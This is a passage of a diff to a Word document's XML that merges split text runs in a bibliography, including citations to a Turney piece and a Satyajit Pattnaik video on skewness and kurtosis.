-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Turney ,Shaun</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> . </w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Turney ,Shaun . </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18498,27 +17579,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>Published on May 10, 2022, Revised on June 22, 2023. [</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Acessed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> on</w:t>
+        <w:t>Published on May 10, 2022, Revised on June 22, 2023. [Acessed on</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18536,39 +17597,18 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">5 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>october</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2023].</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>5 october 2023].</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18578,7 +17618,6 @@
         </w:rPr>
         <w:t>Pattnaik</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18613,27 +17652,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">Skewness and Kurtosis in Statistics | What is Skewness? | Handle Skewness | Satyajit </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Pattnaik</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Skewness and Kurtosis in Statistics | What is Skewness? | Handle Skewness | Satyajit Pattnaik </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18660,27 +17679,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> [</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Acessed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> on 15 </w:t>
+        <w:t xml:space="preserve"> [Acessed on 15 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
